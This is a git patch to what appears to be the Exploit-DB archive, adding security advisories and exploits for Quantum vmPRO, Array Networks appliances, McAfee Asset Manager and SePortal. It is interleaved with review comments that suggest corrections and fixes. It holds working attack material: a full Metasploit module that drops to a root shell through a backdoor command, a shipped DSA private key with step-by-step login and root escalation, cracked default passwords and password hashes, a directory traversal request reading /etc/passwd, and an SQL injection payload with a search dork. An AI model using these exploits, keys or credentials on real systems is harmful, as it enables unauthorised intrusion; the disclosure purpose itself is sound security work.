From 595a23d463dad4ce0405e105d618e3d9f36c16c0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 21 Mar 2014 04:32:58 +0000
Subject: [PATCH] Updated 03_21_2014
---
files.csv | 13 +-
platforms/hardware/local/32370.txt | 85 ++++++++++
platforms/hardware/webapps/32369.txt | 224 +++++++++++++++++++++++++++
platforms/jsp/webapps/32368.txt | 45 ++++++
platforms/multiple/remote/32362.txt | 9 ++
platforms/multiple/remote/32363.txt | 7 +
platforms/php/remote/32359.txt | 44 ++++++
platforms/unix/remote/32367.rb | 136 ++++++++++++++++
platforms/unix/remote/32371.txt | 125 +++++++++++++++
platforms/unix/remote/32372.txt | 95 ++++++++++++
10 files changed, 781 insertions(+), 2 deletions(-)
create mode 100755 platforms/hardware/local/32370.txt
create mode 100755 platforms/hardware/webapps/32369.txt
create mode 100755 platforms/jsp/webapps/32368.txt
create mode 100755 platforms/multiple/remote/32362.txt
create mode 100755 platforms/multiple/remote/32363.txt
create mode 100755 platforms/php/remote/32359.txt
create mode 100755 platforms/unix/remote/32367.rb
create mode 100755 platforms/unix/remote/32371.txt
create mode 100755 platforms/unix/remote/32372.txt
diff --git a/files.csv b/files.csv
index cf202eb62..7e1ff696c 100755
--- a/files.csv
+++ b/files.csv
@@ -13612,7 +13612,7 @@ id,file,description,date,author,platform,type,port 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 
@@ -29055,7 +29055,7 @@ id,file,description,date,author,platform,type,port 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0 -32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 +32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0 32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0 
@@ -29130,8 +29130,17 @@ id,file,description,date,author,platform,type,port 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 +32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"NooMS 1.1 smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32361,platforms/php/webapps/32361.txt,"NooMS 1.1 search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 +32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0 +32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0 +32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22 +32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 +32369,platforms/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,hardware,webapps,0 
+32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
+32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0
+32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22
diff --git a/platforms/hardware/local/32370.txt b/platforms/hardware/local/32370.txt
new file mode 100755
index 000000000..a98701cbb
--- /dev/null
+++ b/platforms/hardware/local/32370.txt
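Review bot: The new 32359 row is typed `php,remote` although it is a web-application SQL injection like the neighbouring 32355 and 32366 rows, which are `php,webapps`, and its description carries the source advisory's misspelling; suggest `32359,platforms/php/webapps/32359.txt,"SePortal 2.5 - SQL Injection Vulnerability",2014-03-19,jsass,php,webapps,0` (the file would need to move with the type, since the path encodes it). The two static-SSH-key rows are also inconsistent with each other: 32372 records port 22 while 32371, the same class of issue exploited over SSH, records 0. The hunk ends inside the CSV, so later rows are not visible here.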
@@ -0,0 +1,85 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Quantum vmPRO 3.1.2 and below + +------------------------- +Affected vendors: +------------------------- + +Quantum +http://quantum.com/ + +------------------------- +Product description: +------------------------- + +Unlike traditional backup applications and other backup applications +designed for virtual environments, +Quantum vmPRO Software backs up VMs in native VMware format. This enables +users to restore or boot VMs +in seconds without the use of a backup application, reduces virtual server +and network usage by reducing +VM image sizes before backing up those images to backup storage, and +substantially reduces the cost of +using traditional backup applications to back up virtual environments. + +---------- +Details: +---------- + +[ 0x01 - Shell Backdoor Command ] + +The file "/usr/local/pancetera/bin/cmd_processor.py" on the vmPRO 3.1.2 +virtual machine contains the following lines: + + def cmd_shell_escape(self, args): + log_panshell(syslog.LOG_INFO, "internal consistency check started") + env = dict(os.environ) + env['SHELL'] = '/bin/bash' + env['HOME'] = '/tmp' + env['TERM'] = 'xterm' + os.spawnle(os.P_WAIT, '/bin/bash', 'bash', env) + log_panshell(syslog.LOG_INFO, "internal consistency check finished") + return + +This is a hidden command to gain a root shell. If we create a user in the +web interface without administrator rights, +we can still ssh and gain a root shell! This of course should not be +possible and only be accessible to an admin user. + +$ ssh non-admin@192.168.2.112 +non-admin@192.168.2.112's password: +Last login: Thu Dec 19 23:42:10 2013 from 192.168.2.72 +Welcome to Quantum vmPRO Console +-------------------------------- + +Quantum vmPRO GUI: https://192.168.2.112/ + +*** Type 'help' for a list of commands. 
+ +quantum:localhost> shell-escape +bash-4.1# id +uid=0(root) gid=100(users) groups=0(root),100(users) + + +----------- +Solution: +----------- + +Upgrade to version 2.3.0.1 or newer + +-------------- +Timeline: +-------------- + +03-01-2014 - Issues discovered and vendor notified +15-01-2014 - No reply, asked for status update. +17-03-2014 - No replies, public disclosure \ No newline at end of file diff --git a/platforms/hardware/webapps/32369.txt b/platforms/hardware/webapps/32369.txt new file mode 100755 index 000000000..374936235 --- /dev/null +++ b/platforms/hardware/webapps/32369.txt 
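Review bot: The Solution line `Upgrade to version 2.3.0.1 or newer` cannot apply to a product whose affected range is `Quantum vmPRO 3.1.2 and below` — 2.3.0.1 is lower than 3.1.2 and is exactly the fix version given in the DXi V1000 advisory (32372), so this looks copied across; the advisory should name the real vmPRO fix release or, consistent with its timeline showing no vendor reply, state that no fix was available at disclosure. A detection hint is worth adding under the code excerpt: the backdoor deliberately logs `internal consistency check started` / `finished` via log_panshell, so that exact message in the appliance's syslog is a usable indicator that someone invoked shell-escape. Until a fix exists, the only mitigation the text supports is restricting SSH access to the appliance to administrators.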
@@ -0,0 +1,224 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances + +------------------------- +Affected vendors: +------------------------- + +Array Networks +http://www.arraynetworks.com/ + +------------------------- +Product description: +------------------------- + +vAPV: +Virtual Application Delivery Controllers for Cloud and Virtualized +Environments +Powered by Array's award-winning 64-bit SpeedCore(tm) architecture, vAPV +virtual application delivery controllers extend Array's +proven price-performance and rich feature set to public and private clouds +and virtualized datacenter environments. +vAPV virtual application delivery controllers give enterprises and service +providers the agility to offer on-demand +load balancing services, dynamically allocate resources to maximize ROI on +application infrastructure and develop and size +new application environments using either private or public clouds. + + +vxAG: +Secure Access Gateways for Enterprise, Cloud & Mobile Environments +Secure access gatewaysSecure access is undergoing dramatic change. With +increasing mobility, growing adoption of cloud +services and a shift in thinking that favors securing data over securing +networks and devices, modern enterprises require +a new breed of secure access solutions. Secure access gateways centralize +control over access to business critical resources, +providing security for data in motion and at rest and enforcing application +level policies on a per user basis. + +The Array AG Series secure access gateway addresses challenges faced by +enterprise, service provider and pubic-sector +organizations in the areas of secure remote and mobile access to +applications and cloud services. 
Available in a range of +scalable, purpose-built appliances or as a virtual appliance for cloud and +virtualized environments, the AG Series can +support multiple communities of interest, connect users both in the office +and on-the-go and provide access to traditional +enterprise applications as well as services running in public and private +clouds. + + +---------- +Details: +---------- + +[ 0x01 - Default Users/Passwords ] + +The /etc/master.passwd file on the vxAG 9.2.0.34 and vAPV 8.3.2.17 +appliances contain default (unkown to the admin) shell users and passwords. + +$ cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission +User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default +User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP +pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web 
Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh +sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh +recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery +mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh +arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh +array::1016:1011::0:0:User &:/:/ca/bin/ca_shell + +Doing a quick password crack, the passwords for the mfg and sync are +revealed: + +User: mfg Password: mfg +User: sync Password: click1 + +The passwords for "test" and "root" couldn't be cracked in a short time. + + +Below an example of logging in with the user "sync" and password "click1" +via SSH. + +$ ssh sync@192.168.2.55 /bin/sh +sync@192.168.2.55's password: +id +uid=1005(sync) gid=0(wheel) groups=0(wheel) + + +[ 0x02 - SSH Private Key ] + +The "sync" user also contains a private key in "~/.ssh/id_dsa": + +$ cat id_dsa +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm +q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM +xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 +Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr +gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq +mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K +O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ +OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb ++0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs ++sqSEhA35Le2kC4Y1/A= +-----END DSA PRIVATE KEY----- + +The following authorized keys file are there in the ~/.ssh directory: + +$ cat authorized_keys +1024 35 
+117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401 +sync@AN + +$ cat authorized_keys2 +ssh-dss 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 +sync@AN + +This makes it possible to use the private key to login without a password. +Do the following on a different system: + +Insert the id_dsa private key in a file called "synckey": + +cat > ~/synckey << EOF +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm +q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM +xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 +Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr +gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq +mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K +O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ +OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb ++0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs ++sqSEhA35Le2kC4Y1/A= +-----END DSA PRIVATE KEY----- +EOF + +Change the rights of the file: + +chmod 600 ~/synckey + +SSH into the vxAG or vAPV appliance (change the IP below): + +ssh -i ~/synckey sync@192.168.2.55 /bin/sh + +Now you won't see a command prompt, but you can enter an "id" for example +and you'll get: + +uid=1005(sync) gid=0(wheel) groups=0(wheel) + + +[ 0x03 - Root Privilege Escalation ] + +The last issue is that the files "/ca/bin/monitor.sh" and +"/ca/bin/debug_syn_stat" are world writable (chmod 777). Any user can write +to these files. +As the sync user it's possible to write to these files. 
If you write +arbitrary commands to the monitor.sh script and then turn the debug +monitoring off and on it will restart the script with root privileges. +The sync user is able to run the /ca/bin/backend tool to execute CLI +commands. Below how it's possible to turn the debug monitor off and on: + +Turn debug monitor off: +/ca/bin/backend -c "debug monitor off"`echo -e "\0374"` + +Turn debug monitor on: +/ca/bin/backend -c "debug monitor on"`echo -e "\0374"` + +Thus through combining the SSH private key issue and the world writable +file + unrestricted backend tool it's possible to gain a remote root shell. + + +----------- +Solution: +----------- + +Upgrade to newer versions + +Workaround: Change passwords and SSH key. Do a chmod 700 on the world +writable file. + +-------------- +Timeline: +-------------- + +03-02-2014 - Issues discovered and vendor notified +08-02-2014 - Vendor replies "Thank you very much for bringing this to our +attention." +12-02-2014 - Asked vendor for status updates and next steps. +17-03-2014 - No replies, public disclosure \ No newline at end of file diff --git a/platforms/jsp/webapps/32368.txt b/platforms/jsp/webapps/32368.txt new file mode 100755 index 000000000..1256dcca2 --- /dev/null +++ b/platforms/jsp/webapps/32368.txt 
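Review bot: The master.passwd listing also shows two accounts with an empty password field, `recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery` and `array::1016:1011::0:0:User &:/:/ca/bin/ca_shell`, which the advisory never mentions; on FreeBSD an empty field normally means no password is required, so whether these are reachable over SSH (PermitEmptyPasswords) or only through their restricted shells should be stated or flagged as untested. The Workaround is also incomplete as written: regenerating the `sync` key pair does nothing unless the shipped public key is removed from both `authorized_keys` and `authorized_keys2`, and `chmod 700 on the world writable file` names one file where section 0x03 names two. Suggest `Workaround: change the mfg/sync/test/root passwords, remove the shipped key from ~sync/.ssh/authorized_keys and authorized_keys2, and strip world-write (e.g. chmod 755) from /ca/bin/monitor.sh and /ca/bin/debug_syn_stat.` Whether the root hash (MD5-crypt, `$1$`) can be recovered offline is not settled by "couldn't be cracked in a short time" and should be treated as an open risk.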
@@ -0,0 +1,45 @@ +Cloud SSO is vuln to unauthed XSS in the authentication audit form: + +https://twitter.com/BrandonPrry/status/445969380656943104 + +McAfee Asset Manager v6.6 multiple vulnerabilities + +http://www.mcafee.com/us/products/asset-manager.aspx + +Authenticated arbitrary file read +An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality. +By generating a report, the user's browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd. + +GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1 +Host: 172.31.16.167 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect= +Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554 +Connection: keep-alive + + +Authenticated SQL injection + +An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. 
In the below request, the 'user' parameter is susceptible to the SQL injection: + +POST /jsp/reports/ReportsAudit.jsp HTTP/1.1 +Host: 172.31.16.167 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp +Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 91 + +fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator + + +-- +http://volatile-minds.blogspot.com -- blog +http://www.volatileminds.net -- website \ No newline at end of file diff --git a/platforms/multiple/remote/32362.txt b/platforms/multiple/remote/32362.txt new file mode 100755 index 000000000..f5b7b8abc --- /dev/null +++ b/platforms/multiple/remote/32362.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31140/info + +Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. + +An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users. + +This issue affects Unreal Engine 3; other versions may also be affected. + +http://www.exploit-db.com/sploits/32362.zip \ No newline at end of file diff --git a/platforms/multiple/remote/32363.txt b/platforms/multiple/remote/32363.txt new file mode 100755 index 000000000..18b74941a --- /dev/null +++ b/platforms/multiple/remote/32363.txt 
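Review bot: The 'Authenticated SQL injection' section contains no injection — the request shown sends the benign value `user=Administrator` with no payload, error output or timing evidence, so a reader cannot reproduce or confirm the claim; at minimum the request should carry the payload actually used, e.g. `user=Administrator'` with the resulting error, or a boolean/time-based pair of requests. The opening lines (`Cloud SSO is vuln to unauthed XSS in the authentication audit form:` plus the twitter link) concern a different product and do not belong in a McAfee Asset Manager advisory. The traversal PoC is reproducible as written, but neither finding states a fixed version, CVE or vendor response, which the other advisories in this commit do.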
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31141/info + +Unreal Engine is prone to multiple remote format-string vulnerabilities. + +Attackers can exploit the issues to execute arbitrary code within the context of a client application that uses the vulnerable engine. + +http://www.exploit-db.com/sploits/32363.zip \ No newline at end of file diff --git a/platforms/php/remote/32359.txt b/platforms/php/remote/32359.txt new file mode 100755 index 000000000..435ff02f3 --- /dev/null +++ b/platforms/php/remote/32359.txt @@ -0,0 +1,44 @@ +#################################################################### +Exploit: SePortal 2.5 Sql Injection Vulnerabilty +Author: jsass +Date : 19\03\2014 +Contact Twitter: @Kwsecurity +Script: http://www.seportal.org/ +version: 2.5 +Tested on: Linux Ubuntu 12.4 & Windows 7 +Dork : "Powered by SePortal 2.5" + +//** Searching And Analysis By Kuwaity Crew **\\ + +#################################################################### + SQL INJECTION Vulnerabilty + + code : + $main_template = 'staticpages'; + +define('GET_CACHES', 1); +define('ROOT_PATH', './'); +define('GET_USER_ONLINE', 1); +define('GET_STATS_BOX', 1); +include(ROOT_PATH.'global.php'); +require(ROOT_PATH.'includes/sessions.php'); + + $sql = "SELECT * + FROM ".STATICPAGE_TABLE." + WHERE sp_id = '".$sp_id."'"; + $result = $site_db->query($sql); + + files: + staticpages.php?sp_id=(inject here) + print.php?mode=staticpage&client=printer&sp_id=(inject here) + +example: + +http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20- + +////////////////////////////////////////////////////////////////////////////////// + + + + + Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & ????? ?????? & medo medo & sec4ever.com & is-sec.com \ No newline at end of file diff --git a/platforms/unix/remote/32367.rb b/platforms/unix/remote/32367.rb new file mode 100755 index 000000000..d9fad3177 
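Review bot: The excerpt pins the root cause — `WHERE sp_id = '".$sp_id."'"` concatenates the request parameter straight into the query — but the advisory never says how to fix it; since sp_id is a numeric identifier the one-line fix is to cast before use, `$sp_id = (int)$_GET['sp_id'];`, or to bind it as a query parameter, and the same applies to the `print.php?mode=staticpage` path. The example payload depends on MySQL's extractvalue() error being echoed back, so it only demonstrates the bug where database errors are displayed; the injection is present regardless. Where sp_id is read from the request is outside the excerpt, so the exact assignment to cast is inferred.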
--- /dev/null
+++ b/platforms/unix/remote/32367.rb
@@ -0,0 +1,136 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::CommandShell + + def initialize(info={}) + super(update_info(info, + 'Name' => "Quantum vmPRO Backdoor Command", + 'Description' => %q{ + This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin + privileges, can get access to the restricted SSH shell. By using the hidden backdoor + "shell-escape" command it's possible to drop to a real root bash shell. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence ' # Original discovery and Metasploit module + ], + 'References' => + [ + ['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt'] + ], + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Quantum vmPRO 3.1.2', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Mar 17 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(22), + OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']), + OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin']) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + + def rhost + datastore['RHOST'] + end + + + def rport + datastore['RPORT'] + end + + + def do_login(user, pass) + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config 
=> true, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, user, opts) + end + rescue Rex::ConnectionError, Rex::AddressInUse + return nil + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return nil + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return nil + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + return nil + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return nil + end + + if ssh + conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true) + return conn + end + + return nil + end + + + def exploit + user = datastore['USER'] + pass = datastore['PASS'] + + print_status("#{rhost}:#{rport} - Attempt to login...") + conn = do_login(user, pass) + if conn + print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'") + handler(conn.lsock) + end + end +end \ No newline at end of file diff --git a/platforms/unix/remote/32371.txt b/platforms/unix/remote/32371.txt new file mode 100755 index 000000000..df4b37cdc --- /dev/null +++ b/platforms/unix/remote/32371.txt 
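Review bot: In do_login the `rescue Rex::ConnectionError, Rex::AddressInUse` branch returns nil silently while every other rescue prints a diagnostic, so a refused connection or wrong RHOST is indistinguishable from a clean "no session" in the console; add `print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"` with `=> e` on that rescue to match the others. The options also pass `:config => true`, which lets Net::SSH read the operator's ~/.ssh/config and can quietly override host, port or identity for the target; `:config => false` is the safer choice for an exploit module. The module also never verifies that `shell-escape` produced a root bash — on a patched or non-vmPRO host the handler still receives a session that is merely the restricted console — so a quick `id` check for `uid=0` before handing off to handler() would make the ExcellentRanking honest.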
